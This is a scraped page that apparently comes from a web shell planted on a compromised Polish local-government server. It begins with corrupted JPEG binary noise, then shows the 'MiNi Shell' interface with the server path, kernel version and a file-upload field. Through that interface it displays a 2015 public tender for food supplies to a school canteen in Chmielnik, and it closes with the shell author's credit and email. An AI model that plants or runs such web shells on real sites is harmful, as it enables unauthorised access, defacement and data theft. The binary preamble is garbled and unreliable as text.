JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150727/110837-N-2015.html

<p class="kh_header"><b>Chmielnik: Dostawa produktów spożywczych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 110837 - 2015; data zamieszczenia: 27.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Oświaty , Plac Kościuszki 7, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 354 32 73, faks 41 354 32 73 wew. 121.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chmielnik.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych stosownie do bieżących potrzeb do stołówki szkolnej przy Gimnazjum im. Gen. Kazimierza Tańskiego w Chmielniku, ul. Szkolna 7, zgodnie z warunkami wynikającymi z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. Nr 171, poz. 1225 z późn. zm.) w tym w szczególności:
-	artykułów spożywczych (różnych),
-	artykułów spożywczych mrożonych,
-	mięsa, przetworów mięsnych,
-	drobiu,
-	ryb,
-	warzyw,
-	owoców,
-	pieczarek,
-	ziemniaków,
-	jaj,
-	mleka i produktów mleczarskich,
-	pieczywa, świeżych wyrobów piekarskich.
Przedmiot zamówienia będzie realizowany sukcesywnie w ilościach wynikających z zapotrzebowań skła-danych bezpośrednio przez Zamawiającego. Dostawy następować będą na podstawie telefonicznego lub pisem-nego zamówienia, którego dokona pracownik upoważniony przez Zamawiającego (intendent) w terminie 24 godzin od momentu złożenia zamówienia .
Wykonawca dostarczać będzie zamówioną partię towaru do Zamawiającego w dni robocze w godzinach od 7 00 do 8 00, własnym środkiem transportu i na własne ryzyko oraz nie będzie obciążać kosztami transportu Za-mawiającego. Wykonawca zobowiązany jest do wniesienia towarów do magazynów żywnościowych znajdujących się w obiektach Gimnazjum im. gen. K. Tańskiego w Chmielniku.
Wszystkie oferowane artykuły muszą pochodzić z bieżącej produkcji oraz muszą być pełnowartościowe w pierwszym gatunku, tzn. bez śladów uszkodzenia, opakowane oryginalnie z widocznym terminem przydatności do użytku. Opakowania mają być nienaruszone, posiadać zabezpieczenia zastosowane przez producenta oraz znaki identyfikujące produkt, a w szczególności znak towarowy produktu lub markę producenta artykułu. Jakość oferowanych artykułów powinna być zgodna z Polskimi Normami i obowiązującymi w tym zakresie przepisami.
Upoważnieni pracownicy Zamawiającego (intendent i szefowa kuchni) będą dokonywać odbioru towaru pod względem ilościowo-wartościowym oraz obowiązujących norm jakościowych. Zamawiającemu przysługuje prawo odmowy przyjęcia towaru w przypadku wad ilościowych lub jakościowych.
W przypadku zakwestionowania przez Zamawiającego dostarczonego towaru Wykonawca zobowiązuje się do jego wymiany na pełnowartościowy, w terminie nie dłuższym niż 24 godziny od zgłoszenia reklamacji.
Zakwestionowany towar zostanie zwrócony Wykonawcy i odebrany transportem na koszt Wykonawcy. Za-mawiający nie odpowiada za straty poniesione przez Wykonawcę z tytułu zwrotu kwestionowanej partii towaru.
Dostarczane produkty spożywcze muszą być odpowiednio posortowane przez Wykonawcę i muszą być najwyższej jakości, w tym przede wszystkim muszą odpowiadać wymaganiom jakościowym stosownie do obo-wiązujących przepisów oraz muszą spełniać obowiązujące w tym zakresie normy sanitarno-epidemiologiczne, a także muszą być przechowywane i transportowane w warunkach gwarantujących najwyższą jakość.
Dostawy mięsa, drobiu i przetworów mięsnych powinny odbywać się w zamkniętych opakowaniach, lub pojemnikach plastikowych z pokrywami, posiadającymi stosowne atesty, pojemnikach plombowanych lub metkowanych, czystych i nieuszkodzonych. Warzywa i owoce powinny być świeże, bez oznak zepsucia i pleśni . Produkty spożywcze powinny być dostarczone w oryginalnych, nienaruszonych opakowaniach zawierających oznaczenia fabryczne, tzn. rodzaj, nazwę wyrobu, ilość, datę przydatności do spożycia, nazwę i adres producenta, oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego. Dostarczane produkty spożywcze w zależności od ich kategorii muszą przy każdej dostawie posiadać wszystkie niezbędne dokumenty wymagane przepisami prawa żywnościowego.
Opis części zamówienia
Część 1 - artykuły spożywcze (różne) - zgodnie z formularzem ofertowym - 
załącznik nr 1a do SIWZ
1.	Chrzan tarty 180g	12 kg
2.	Pomidory w puszce 400g	160 kg
3.	Groszek konserwowy 400g	40 kg
4.	Kukurydza konserwowa	40 kg
5.	Koncentrat grzybowy 180g	25 kg
6.	Koncentrat pomidorowy 30% np. Pudliszki 	400 kg
7.	Zupa grzybowa w torebkach	12 kg
8.	Zupa pieczarkowa w torebkach	12 kg
9.	Barszcz biały w torebkach	50 kg
10.	Barszcz biały (butelka)	400 L
11.	Sos pomidorowy 38g	30 kg
12.	Sos pieczeniowy ciemny 30g	4 kg
13.	Sos pieczarkowy 	6 kg
14.	Delikat do kurczaka 25g	40 kg
15.	Vegeta (np. Podravka)	400 kg
16.	Sól zmiękczająca mięso 30g	5 kg
17.	Sos koperkowo-ziołowy 9g	3 kg
18.	Maggi w płynie 200g	180 kg
19.	Bazylia 10g	1,5 kg
20.	Oregano 10g	1,5 kg
21.	Sól czosnkowa 20g	6 kg
22.	Zioła prowansalskie 10g	1,5 kg
23.	Przyprawa do ryb 20g	2 kg
24.	Liść laurowy 15g	6 kg
25.	Majeranek 10g	6 kg
26.	Pieprz czarny mielony 15g	12 kg
27.	Ziele angielskie 15g	6 kg
28.	Papryka słodka 20g	1 kg
29.	Koncentrat szczawiowy	20 kg
30.	Cukier op. 1 kg	800 kg
31.	Sól op. 1 kg	800 kg
32.	Kwasek cytrynowy 70g	12 kg
33.	Majonez kielecki 	200 kg
34.	Ryż	200 kg
35.	Ryż ekspresowy (4 saszetki w opakowaniu)	1 500 op.
36.	Kasza jęczmienna gruba	700 kg
37.	Mąka ziemniaczana	40 kg
38.	Mąka pszenna typ 450	600 kg
39.	Makaron nitki (pięciojajeczny) np. czaniecki	800kg
40.	Makaron fale np. Lubella	800 kg
41.	Makaron rurki np. Lubella	400 kg
42.	Makaron świderki np. Lubella	400 kg
43.	Makaron łazanki (małe) np. Lubella	400 kg
44.	Makaron muszelki np. Lubella	400 kg
45.	Makaron mini muszelki np. Lubella	200 kg
46.	Olej roślinny 5L	600 L
47.	Olej słonecznikowy 1L	100 L
48.	Frytura	1 000 kg
49.	Ogórek konserwowy 0,9L	900 kg
50.	Ogórek kiszony	1 000 kg
51.	Bułki parowane 	10 000 szt.
52.	Soczki w kartonikach różne smaki 02,L	25 000 szt.
53.	Batoniki czekoladowe 39g np. Grześki	10 000 szt.
54.	Wafelki 49g np. Pincessa	5 000 szt.
55.	Wafelki 25g np. Knoppers	5 000 szt.
56.	Paluszki słone 70g np. Lajkonik	10 000 szt.
57.	Ciastka herbatniki 200g	10 000 szt.
58.	Groch łuskany 500g	150 kg
59.	Dżem 260g różne smaki	28 kg
60.	Grzyby suszone (borowiki, podgrzybki)	5 kg
61.	Sos neapolitański	30 kg
62.	Przyprawa do mięs Delikat	30 kg
63.	Ocet (0,5 L)	10 L
64.	Gałka muszkatołowa	5 kg
65.	Jogurt naturalny 180g	150 szt.
66.	Jogurt 400g np. Aktimel	2 500 szt.
67.	Jogurt pitny 150g np. Danone	2 500 szt.
68.	Jogurt owocowy od 120g do150 g (różne smaki)	18 000 szt.
69.	Margaryna (kostka 250g) np. Palma 	500 kg
70.	Kostki rosołowe wołowe	14 kg
71.	Kostki rosołowe drobiowe	14 kg
Część 2 - artykuły spożywcze mrożone - zgodnie z formularzem ofertowym - załącznik nr 1b do SIWZ.
1.	Marchewka mrożona (kostka)	1 000 kg
2.	Kalafior mrożony	500 kg
3.	Zupy jarzynowe siedmioskładnikowe	500 kg
4.	Truskawki mrożone	1 000 kg
5.	Kluski śląskie	600 kg
6.	Pyzy z mięsem	300 kg
7.	Uszka z kapustą i grzybami	300 kg
8.	Pierogi z serem	800 kg
9.	Pierogi z mięsem i kapustą	1 000 kg
10.	Pierogi z grzybami i kapustą	1 000 kg
11.	Knedle ze śliwkami	1 000 kg
12.	Pyzy ziemniaczane	1 000 kg
13.	Pierogi z truskawkami	500 kg
Część 3 - mięso, przetwory mięsne - zgodnie z formularzem ofertowym - załącznik nr 1c do SIWZ.
1.	Schab wieprzowy (bez kości)	1 200 kg
2.	Karkówka (bez kości)	900 kg
3.	Mięso z szynki (bez kości)	900 kg
4.	Łopatka wieprzowa (bez kości)	900 kg
5.	Mięso gulaszowe wieprzowe (bez kości)	1 000 kg
6.	Łata wołowa	100 kg
7.	Pręga wołowa	100 kg
8.	Wołowe drobne	100 kg
9.	Słonina	400 kg
10.	Ogon wołowy	70 kg
11.	Kości wieprzowe od karku	300 kg
12.	Kości wieprzowe od schabu	300 kg
13.	Żeberka wieprzowe	500 kg
14.	Smalec	500 kg
15.	Kiełbasa podwawelska	1 000 kg
16.	Kiełbasa śląska	1 000 kg
17.	Żebra wołowe 	100 kg
18.	Boczek wędzony	500 kg
19.	Wołowina pieczeniowa	300 kg
Część 4 - drób - zgodnie z formularzem ofertowym - załącznik nr 1d do SIWZ.
1.	Filet z kurczaka (świeży)	2 000 kg
2.	Udko z kurczaka (świeże)	2 000 kg
3.	Korpus z kurczaka ze skrzydłami (świeży)	2 000 kg
4.	Kura rosołowa (świeża) 	200 kg
5.	Szyje indycze (świeże)	200 kg
6.	Korpus z kaczki (świeży)	150 kg
7.	Korpus z gęsi (świeży)	150 kg
Część 5 - ryby - zgodnie z formularzem ofertowym - załącznik nr 1e do SIWZ. 
1.	Filet z Mintaja bez glazury SHP (Shatterpack)	1 000 kg
2.	Filet z Dorsza bez glazury SHP (Shatterpack)	1 000 kg
3.	Filet z Miruny bez glazury SHP (Shatterpack)	1 000 kg
4.	Filet z Tilapii bez glazury SHP (Shatterpack)	1 000 kg
Część 6 - warzywa - zgodnie z formularzem ofertowym - załącznik nr 1f do SIWZ.
1.	Cebula	600 kg
2.	Marchew	1 200 kg
3.	Seler (korzeń)	500 kg
4.	Pietruszka (korzeń)	1 000 kg
5.	Por	1 500 szt.
6.	Ogórki sałatkowe	600 kg
7.	Pietruszka natka (w pęczkach)	1 500 szt.
8.	Szczypior (w pęczkach)	200 szt.
9.	Koper świeży (w pęczkach)	2 500 szt.
10.	Czosnek (główka)	300 szt.
11.	Rzodkiewka (w pęczkach)	300 szt.
12.	Kapusta biała	500 szt.
13.	Kapusta biała młoda (w czerwcu)	300 szt.
14.	Kapusta czerwona	400 szt.
15.	Kalafior (minimum 1,5kg)	300 szt.
16.	Brokuły	300 szt.
17.	Buraki czerwone	2 000 kg
18.	Fasola Jaś duży	400 kg
19.	Kapusta kwaszona (wiadro 10kg)	1 500 kg
20.	Kapusta pekińska	1 500 szt.
21.	Papryka czerwona, słodka	100 kg
22.	Pomidory	200 kg
23.	Sałata zielona	400 szt.
24.	Fasola szparagowa (żółta)	300 kg
25.	Papryka zielona	150 kg
26.	Papryka żółta	150 kg
Część 7 - owoce - zgodnie z formularzem ofertowym - załącznik nr 1g do SIWZ.
1.	Jabłka	4 000 kg
2.	Mandarynki	500 kg
3.	Banany	1 000 kg
4.	Kiwi	200 kg
5.	Pomarańcze	1 500 kg
6.	Nektarynki	200 kg
7.	Brzoskwinie	200 kg
8.	Śliwki Węgierki (duże) (od września do listopada)	300 kg
9.	Gruszki (od września do listopada)	800 kg
10.	Truskawki świeże (maj czerwiec)	400 kg
Część 8 - ziemniaki - zgodnie z formularzem ofertowym - załącznik nr 1h do SIWZ.
1.	Ziemniaki jadalne (w workach siatkowych po 15kg)	15 000 kg
2.	Ziemniaki jadalne (młode w miesiącu czerwcu) 	3 000 kg
Część 9 - pieczarki - zgodnie z formularzem ofertowym - załącznik nr 1i do SIWZ.
1.	Pieczarki 	500 kg
Część 10 - jaja - zgodnie z formularzem ofertowym - załącznik nr 1j do SIWZ.
1.	Jaja (rozmiar minimum XL)	20 000 szt.
Część 11 - mleko i produkty mleczarskie - zgodnie z formularzem ofertowym - załącznik nr 1k do SIWZ.
1.	Serek waniliowy 140g	8 000 szt.
2.	Ser biały półtłusty	700 kg
3.	Ser żółty (Gouda)	300 kg
4.	Ser topiony śmietankowy	250 kg
5.	Śmietana 30%	1 200 L
6.	Śmietana 18% (kwaśna)	1 200 kg
7.	Masło Extra (kostka 250g)	500 kg
Część 12 - pieczywo, świeże wyroby piekarskie - zgodnie z formularzem ofertowym - załącznik nr 1L do SIWZ.
1.	Chleb mieszany krojony 0,9kg	3 000 szt.
2.	Chleb mieszany 0,6kg (foremka) krojony	7 000 szt.
3.	Chleb ciemny 0,6kg	1 500 szt.
4.	Bułka zwykła pszenna 50g	10 000 szt.
5.	Bułka słodka z nadzieniem 100g	8 000 szt.
6.	Bułka tarta	1 200 kg
7.	Pączki z nadzieniem owocowym	2 500 szt.
8.	Bułki z jagodami 	2 500 szt.
Miejsce dostarczania przedmiotu zamówienia:
Stołówka szkolna przy Gimnazjum im. gen. K. Tańskiego w Chmielniku
ul. Szkolna 7,   26-020 Chmielnik.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 7  ustawy Prawo zamówień publicznych stanowiących nie więcej niż 20 % wartości zamówienia podstawo-wego i polegających na rozszerzeniu dostawy, jeżeli zmiana wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i dozorze, jeżeli zamówienie podstawo-we zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniają-ce było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przed-miotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w sposób spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w sposób spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w sposób spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w sposób spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w sposób spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularze ofertowe - Załączniki od Nr 1a do 1L do SIWZ
2. Oświadczenie o podwykonawcach - Załącznik Nr 5 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa będzie zawierała zapis:
-	ustalenia zawarte w niniejszej umowie są ostateczne i nie mogą ulec zmianie, chyba, że:
-nastąpi zmiana ustawowej stawki podatku VAT,
- zmiana ilości dostarczanych produktów spożywczych ze względu na zmianę liczby uczniów lub pra-cowników szkoły uprawnionych do korzystania ze stołówki szkolnej.
-	w przypadku ustawowej zmiany stawki podatku VAT Zamawiający może dokonać zmiany umowy w zakresie wynagrodzenia Wykonawcy, a ewentualna zmiana może nastąpić ze skutkiem od dnia ogłoszenia w Dzienniku Ustaw i wejścia w życie ustawy zmieniającej wysokość stawki podatku VAT do dnia zakończenia realizacji przedmiotu zamówienia, po złożeniu stosownego wniosku o dokonanie takiej zmiany przez Wykonawcę lub przez Zamawiającego,
-	zmiany te można będzie wprowadzić wyłącznie za zgodą obu umawiających się stron w formie pisem-nej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Budynek Urzędu Miasta i Gminy - Zespół Obsługi Oświaty, 26-020 Chmielnik, Plac Kościuszki 7, pokój nr 121, Pan Marek Nowak.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2015 godzina 10:00, miejsce: Budynek Urzędu Miasta i Gminy w Chmielniku, 26-020 Chmielnik, Plac Kościuszki 7 pokój nr 102, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com